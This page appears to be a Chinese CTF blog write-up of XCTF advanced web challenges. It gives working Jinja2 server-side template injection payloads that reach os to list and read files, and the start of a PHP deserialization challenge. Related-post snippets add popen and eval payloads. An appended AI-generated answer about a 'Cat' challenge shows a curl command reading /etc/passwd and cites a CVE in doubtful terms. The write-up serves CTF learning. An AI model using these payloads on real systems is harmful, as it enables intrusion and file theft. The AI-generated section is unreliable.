攻防世界web解题[进阶](五)

最新推荐文章于 2025-04-27 12:15:24 发布
最新推荐文章于 2025-04-27 12:15:24 发布
阅读量571 收藏 1
点赞数
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46703850/article/details/114499316
版权
这篇博客介绍了CTF比赛中的Web安全题目,涉及Python模板注入和PHP反序列化两个主题。在Python模板注入部分,详细阐述了如何利用os命令执行来读取文件获取flag。而在PHP反序列化部分,解释了如何绕过__wakeup方法,最终成功获取flag。同时,还探讨了Tornado框架的使用,通过MD5加密解决访问权限问题,并分享了Flask模板注入的payload及获取flag的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界web解题[进阶](五)


介绍:记录解题过程

15.Web_python_template_injection(python 模板注入)

题目描述:暂无

python template injection
python 模板注入(ssti模板注入)

<1>. 尝试:

http://111.200.241.244:44969/{
   {
   7*7}}

在这里插入图片描述

<2>. 得到可用的类的列表:

{
   {
   ''.__class__.__mro__[2].__subclasses__()}}
  • 回显:
    在这里插入图片描述

<3>. 我们需要的是os命令执行类<class ‘os._wrap_close’>,我们要判断他所属的位置,这样才能进行索引,os命令执行再列出文件:

  • payload
{
   {
   ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
  • 回显:
URL http://111.200.241.244:44969/['fl4g', 'index.py'] not found

<4>.读取文件flag内容:

  • payload:
{
   {
   ''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
  • flag:
URL http://111.200.241.244:44969/ctf{
   f22b6844-5169-4054-b2a0-d95b9361cb57} not found

16.Web_php_unserialize( php 反序列)

题目描述:暂无

  • 首页:
<?php 
class Demo {
    
    private $file = 'index.php';
    public function __construct($file) {
    
        $this->file = $file; 
    }
    function __destruct() {
    
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() {
    
        if ($this->file !=
最低0.47元/天 解锁文章
ssti
2h4ox1n9
05-23 1049
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
攻防世界 web高手进阶10分题 Guess
闵行小鱼塘
11-03 1520
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
[第三章 web 进阶] SSTI——WP
weixin_54227009的博客
04-02 483
注:基类的子列表[127]为os(这台靶场上的python环境是127,每个python版本不一样,好比python3.9貌似没os了)4、测试是否存在模板注入url?password={{2*2}}2、进入网页发现password is wrong。3、猜测password为参数。查看当前目录下有那些文件。1、题目提示为SSTI
CTF 中的 ssti
最新发布
yqya_的博客
04-27 915
ctf 中对于 ssti 的考察
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1691
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
第三章 web进阶n1book
qq_51558360的博客
03-07 785
[第三章 web进阶]Python里的SSRF 直接按照提示来: 127.0.0.1是被禁止的 用0.0.0.0代替127.0.0.1就是成功了, 127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。 本题有多重解法 - `0.0.0.0:8000` 绕过 - `[::1]:8000` 绕过(需要支持 ipv6) - 重定向跳转到 `127.0.0.1:8000` - dns rebinding 输入一个域名,第
【BUUCTF N1BOOK】[第三章 web进阶] 通关
人若无名,便可专心练剑
02-09 1596
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
【XCTF 攻防世界WEB 高手进阶区 shrine(ssti,待补充)
weixin_45844670的博客
09-01 901
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
攻防世界 web高手进阶10分题 url
闵行小鱼塘
10-19 1835
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是url的writeup
攻防世界 web高手进阶10分题 TimeKeeper
闵行小鱼塘
10-19 1609
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶区 8分题 upload
闵行小鱼塘
08-28 541
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是upload的writeup
攻防世界 web高手进阶10分题 xss1
闵行小鱼塘
11-10 872
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
服务器模板注入 (SSTI)
since_2020的博客
09-08 338
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
web入门--ssti
whisper921的博客
04-16 2821
web361 注入点是?name。 ?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 利用的是os._wrap_close类 得到flag ctfshow{77ca18dd-38c5-4a9c-a735-522a8af345c9} web362 可以用以下已有的函数,去得到__builtins__,然后用eval就可以了:
xss靶场和ctfshow ssti的前八题
2301_80217595的博客
03-15 1076
如何得到payload?1、先找基类object,用空字符串""来找在python中,object类是Python中所有类的基类,如果定义一个类时没有指定继承哪个类,则默认继承object类。使用?name={{"".__class__}},得到空字符串的类<class 'str'>点号. :python中用来访问变量的属性__class__:类的一个内置属性,表示实例对象空字符串""的类。然后使用?
攻防世界php2_攻防世界 WEB Web_php_unserialize
weixin_39649490的博客
12-19 218
0x00 - 题目描述PHP 反序列,老题新做了。打开 index.php 是这样的0x01 - 解题过程先审计一下代码,执行过程是从 17 行开始。123456789101112131415161718192021222324252627...
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 5566
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
os.system与os.popen的用法
weixin_41893060的博客
06-29 4710
def decompress(zipFilePath,csvDir): if platform.system() == "Windows": cmd = '7z.exe x %s -o%s' % (zipFilePath, csvDir) else: cmd = '7za x %s -o%s' % (zipFilePath, csvDir) ...
攻防世界-Web-Exercise-Wirteup
08-08 442
攻防世界Web进阶区题目部分记录。前面题型比较基础,仅记录较为典型的题目用于以后知识点的回顾。 目录 Web_php_unserialize Web_php_unserialize 题目描述: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _
攻防世界Cat
04-03
<think>嗯,用户想了解攻防世界的Cat相关CTF题解或者网络安全工具。首先,我需要确认“Cat”在攻防世界中的具体指向。根据引用[2]和[3],提到的是关于密码分析和数据库访问的题目,可能涉及文件包含或路径遍历漏洞。比如题目中提到使用@符号读取本地数据库文件,这可能与PHP的curl封装器有关,需要利用@来访问本地路径。另外,引用[3]中的解法是通过构造特定路径@/opt/apt/database.sqlite3来获取flag,这说明题目可能存在代码中的curl调用,并需要绕过某些限制。 接下来,我需要整理解题步骤,包括如何分析代码、利用漏洞点、构造payload等。可能涉及的知识点包括PHP的文件处理、curl的本地文件读取漏洞,以及SQLite数据库的路径猜测。此外,用户还可能想知道类似的CTF题目的解题思路,比如如何识别提示中的关键字(如cat可能不直接相关),或者使用其他工具如Burp Suite进行请求拦截和修改。 另外,用户可能对相关的网络安全工具感兴趣,比如dirsearch用于目录扫描,sqlmap用于SQL注入检测,或者curl本身在CTF中的利用方式。需要结合实例说明这些工具在解题过程中的应用场景。 最后,生成相关问题时,要涵盖漏洞类型、工具使用、解题技巧和进阶练习方向,帮助用户全面理解Cat题目的解决方法和扩展知识。</think>### 攻防世界Cat CTF题解分析 #### 题目背景 Cat题目属于Web类CTF挑战,主要考察文件路径处理漏洞与本地文件读取能力。根据引用[2][3],题目通过"cat"相关提示引导选手分析代码逻辑,最终需要利用特殊符号绕过限制读取数据库文件获取flag。 #### 解题步骤 1. **代码审计** - 发现题目使用PHP的`curl`函数进行文件读取 - 关键代码段存在类似`curl($_GET['url'])`的结构 2. **漏洞利用** - 利用`@`符号触发PHP的封装协议特性: ```php http://example.com?url=@/opt/apt/database.sqlite3 ``` - `@`符号使curl将路径识别为本地文件路径而非URL[^3] 3. **数据库读取** - 通过构造路径访问SQLite数据库: ```sql SELECT * FROM flag_table; ``` - 最终从数据库字段中提取flag值 #### 关键技术点 1. **PHP封装协议特性** - `file://`协议默认被禁用时,`@`符号可绕过限制 - 对应漏洞原理:CVE-2020-13698类路径解析漏洞 2. **SQLite数据库路径猜测** - 常见CTF数据库路径: ``` /var/www/html/db.sqlite3 /opt/data/flag.db ``` #### 相关工具推荐 | 工具名称 | 使用场景 | 示例命令 | |---------------|------------------------------|------------------------------| | curl | 验证文件读取漏洞 | `curl -v "http://target?url=@/etc/passwd"` | | sqlite3 | 解析获取的数据库文件 | `sqlite3 database.sqlite3 .dump` | | Burp Suite | 拦截修改HTTP请求测试payload | 配置Repeater模块进行参数爆破 |
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值